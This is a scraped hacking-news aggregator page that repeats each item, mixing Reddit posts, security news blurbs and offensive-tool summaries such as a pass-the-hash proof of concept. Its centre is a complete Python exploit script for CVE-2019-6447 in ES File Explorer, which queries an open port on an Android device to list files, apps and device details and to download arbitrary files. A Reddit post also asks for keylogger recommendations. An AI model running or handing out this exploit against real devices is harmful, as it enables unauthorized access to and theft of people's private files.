hacking: security in practice
Text string that crashes text editors
I've seen in some youtube videos of people doing malware analysis that some hackers put at the end of their source code a string of characters that is not interpretable by text editors, and the only way to get the content of the file is to remove from the terminal the last line of the file and then open it.
Could someone tell me where to find this string and explain me why this happens? (I suppose it's because the characters inside are not interpretable, but it seems quite strange since it reminds me the iphone bug)
submitted by /u/Jefry99
[link] [comments]
Text string that crashes text editors
I've seen in some youtube videos of people doing malware analysis that some hackers put at the end of their source code a string of characters that is not interpretable by text editors, and the only way to get the content of the file is to remove from the terminal the last line of the file and then open it.
Could someone tell me where to find this string and explain me why this happens? (I suppose it's because the characters inside are not interpretable, but it seems quite strange since it reminds me the iphone bug)
submitted by /u/Jefry99
[link] [comments]
reddit
r/hacking - Text string that crashes text editors
0 votes and 0 comments so far on Reddit
hacking: security in practice
What keyloggers do you use?
anything with good reputation?
submitted by /u/alex11263jesus
[link] [comments]
What keyloggers do you use?
anything with good reputation?
submitted by /u/alex11263jesus
[link] [comments]
reddit
r/hacking - What keyloggers do you use?
0 votes and 1 comment so far on Reddit
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
ES File Explorer 4.1.9.7.4 Arbitrary File Read
https://2.bp.blogspot.com/-209TE5VbJR0/WWlvlKjkdxI/AAAAAAAAIQ8/gHk0ahoua8cqyTuIh5dYs6hAVa_ekYeoACLcBGAs/s1600/hack_img.png
ES File Explorer version 4.1.9.7.4 arbitrary file read exploit.
MD5 |
Download
Source:packetstormsecurity.com
ES File Explorer 4.1.9.7.4 Arbitrary File Read
https://2.bp.blogspot.com/-209TE5VbJR0/WWlvlKjkdxI/AAAAAAAAIQ8/gHk0ahoua8cqyTuIh5dYs6hAVa_ekYeoACLcBGAs/s1600/hack_img.png
ES File Explorer version 4.1.9.7.4 arbitrary file read exploit.
MD5 |
3c25d5c9cc6d583b07aa0211035656b6Download
# Exploit Title: ES File Explorer 4.1.9.7.4 - Arbitrary File Read
# Date: 29/06/2021
# Exploit Author: Nehal Zaman
# Version: ES File Explorer v4.1.9.7.4
# Tested on: Android
# CVE : CVE-2019-6447
import requests
import json
import ast
import sys
if len(sys.argv) < 3:
print(f"USAGE {sys.argv[0]} <ip[file to download]")
sys.exit(1)
url = 'http://' + sys.argv[2] + ':59777'
cmd = sys.argv[1]
cmds = ['listFiles','listPics','listVideos','listAudios','listApps','listAppsSystem','listAppsPhone','listAppsSdcard','listAppsAll','getFile','getDeviceInfo']
listCmds = cmds[:9]
if cmd not in cmds:
print("[-] WRONG COMMAND!")
print("Available commands : ")
print(" listFiles : List all Files.")
print(" listPics : List all Pictures.")
print(" listVideos : List all videos.")
print(" listAudios : List all audios.")
print(" listApps : List Applications installed.")
print(" listAppsSystem : List System apps.")
print(" listAppsPhone : List Communication related apps.")
print(" listAppsSdcard : List apps on the SDCard.")
print(" listAppsAll : List all Application.")
print(" getFile : Download a file.")
print(" getDeviceInfo : Get device info.")
sys.exit(1)
print("\n==================================================================")
print("| ES File Explorer Open Port Vulnerability : CVE-2019-6447 |")
print("| Coded By : Nehal a.k.a PwnerSec |")
print("==================================================================\n")
header = {"Content-Type" : "application/json"}
proxy = {"http":"http://127.0.0.1:8080", "https":"https://127.0.0.1:8080"}
def httpPost(cmd):
data = json.dumps({"command":cmd})
response = requests.post(url, headers=header, data=data)
return ast.literal_eval(response.text)
def parse(text, keys):
for dic in text:
for key in keys:
print(f"{key} : {dic[key]}")
print('')
def do_listing(cmd):
response = httpPost(cmd)
if len(response) == 0:
keys = []
else:
keys = list(response[0].keys())
parse(response, keys)
if cmd in listCmds:
do_listing(cmd)
elif cmd == cmds[9]:
if len(sys.argv) != 4:
print("[+] Include file name to download.")
sys.exit(1)
elif sys.argv[3][0] != '/':
print("[-] You need to provide full path of the file.")
sys.exit(1)
else:
path = sys.argv[3]
print("[+] Downloading file...")
response = requests.get(url + path)
with open('out.dat','wb') as wf:
wf.write(response.content)
print("[+] Done. Saved as `out.dat`.")
elif cmd == cmds[10]:
response = httpPost(cmd)
keys = list(response.keys())
for key in keys:
print(f"{key} : {response[key]}")
Source:packetstormsecurity.com
Hacking Articles Tips Tricks Videos Tutorials
Photo
Dark Reading: Attacks/Breaches
Survey Data Reveals Gap in Americans' Security Awareness
Survey data reveals many people have never heard of major cyberattacks, including the attack targeting Colonial Pipeline.
Survey Data Reveals Gap in Americans' Security Awareness
Survey data reveals many people have never heard of major cyberattacks, including the attack targeting Colonial Pipeline.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Kali Linux Tutorials
NamedPipePTH : Pass The Hash To A Named Pipe For Token Impersonation
NamedPipePTH project is a PoC code to use Pass-the-Hash for authentication on a local Named Pipe user Impersonation. There also is a blog post for explanation: https://s3cur3th1ssh1t.github.io/Named-Pipe-PTH/ It is heavily based on the code from the projects Invoke-SMBExec.ps1 and RoguePotato. I faced certain Offensive Security project situations in the past, where I already had the NTLM-Hash of a low […]
The post NamedPipePTH : Pass The Hash To A Named Pipe For Token Impersonation appeared first on Kali Linux Tutorials.
NamedPipePTH : Pass The Hash To A Named Pipe For Token Impersonation
NamedPipePTH project is a PoC code to use Pass-the-Hash for authentication on a local Named Pipe user Impersonation. There also is a blog post for explanation: https://s3cur3th1ssh1t.github.io/Named-Pipe-PTH/ It is heavily based on the code from the projects Invoke-SMBExec.ps1 and RoguePotato. I faced certain Offensive Security project situations in the past, where I already had the NTLM-Hash of a low […]
The post NamedPipePTH : Pass The Hash To A Named Pipe For Token Impersonation appeared first on Kali Linux Tutorials.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Gather information and exploit the network with Dracnmap
https://cdn-images-1.medium.com/max/771/1*RvUNVXB7sUQjuzjyQ78ewA.png
Dracnmap is an open-source program that is utilizing to misuse the system and gathering data with Nmap help. Nmap command accompanies…
Continue reading on Purple TEAM »
Gather information and exploit the network with Dracnmap
https://cdn-images-1.medium.com/max/771/1*RvUNVXB7sUQjuzjyQ78ewA.png
Dracnmap is an open-source program that is utilizing to misuse the system and gathering data with Nmap help. Nmap command accompanies…
Continue reading on Purple TEAM »
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Comprehensive OSINT framework — ReconSpider
https://cdn-images-1.medium.com/max/746/1*1VLlsZEgynnQM-XaV2VXOA.png
ReconSpider is a capable tool to perform Open Source Intelligence scans on email, domain, ip_address, and organization. ReconSpider…
Continue reading on Purple TEAM »
Comprehensive OSINT framework — ReconSpider
https://cdn-images-1.medium.com/max/746/1*1VLlsZEgynnQM-XaV2VXOA.png
ReconSpider is a capable tool to perform Open Source Intelligence scans on email, domain, ip_address, and organization. ReconSpider…
Continue reading on Purple TEAM »
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
LinkedIn 700 Milyon Veri Çaldırdı!
https://cdn-images-1.medium.com/max/1080/1*TgLNyW2eAxEkYfQHUb1Wrw.png
LinkedIn’in 700 milyon kişinin verileri çalındığı iddia ediliyor.
Continue reading on Medium »
LinkedIn 700 Milyon Veri Çaldırdı!
https://cdn-images-1.medium.com/max/1080/1*TgLNyW2eAxEkYfQHUb1Wrw.png
LinkedIn’in 700 milyon kişinin verileri çalındığı iddia ediliyor.
Continue reading on Medium »
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Hackers Are Investing in Each Other’s Operations — Just Like VCs Invest in Startups
https://cdn-images-1.medium.com/max/2600/1*2AoMAgFnpmJ33mlMaWf37w.jpeg
Ransomware continues to grow more sophisticated and lucrative, and now security firm LIFARS says operators have built a Silicon…
Continue reading on Fast Company »
Hackers Are Investing in Each Other’s Operations — Just Like VCs Invest in Startups
https://cdn-images-1.medium.com/max/2600/1*2AoMAgFnpmJ33mlMaWf37w.jpeg
Ransomware continues to grow more sophisticated and lucrative, and now security firm LIFARS says operators have built a Silicon…
Continue reading on Fast Company »
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Python in Ethical Hacking
https://cdn-images-1.medium.com/max/1280/0*_aSmuf1mgZnYhJR6.jpg
We can use gedit as the code editor in kali linux.
Continue reading on Medium »
Python in Ethical Hacking
https://cdn-images-1.medium.com/max/1280/0*_aSmuf1mgZnYhJR6.jpg
We can use gedit as the code editor in kali linux.
Continue reading on Medium »
Deep Web
Is it illegal to browse deep web sites ?
I'm curious about the deep web, and I want to check if these black market sites are real. I'm not going to be purchasing anything (why I'm posting this on reddit with no VPN, I don't mind my ISP tracking me because im not going to be doing anything like that) or viewing demented stuff (you can guess). but seeing all the posts and stories about sites like the Silk Road and such, is it illegal to simply view these sites? I feel like it's not but I wanna check to make sure
submitted by /u/Connor30302
[link] [comments]
Is it illegal to browse deep web sites ?
I'm curious about the deep web, and I want to check if these black market sites are real. I'm not going to be purchasing anything (why I'm posting this on reddit with no VPN, I don't mind my ISP tracking me because im not going to be doing anything like that) or viewing demented stuff (you can guess). but seeing all the posts and stories about sites like the Silk Road and such, is it illegal to simply view these sites? I feel like it's not but I wanna check to make sure
submitted by /u/Connor30302
[link] [comments]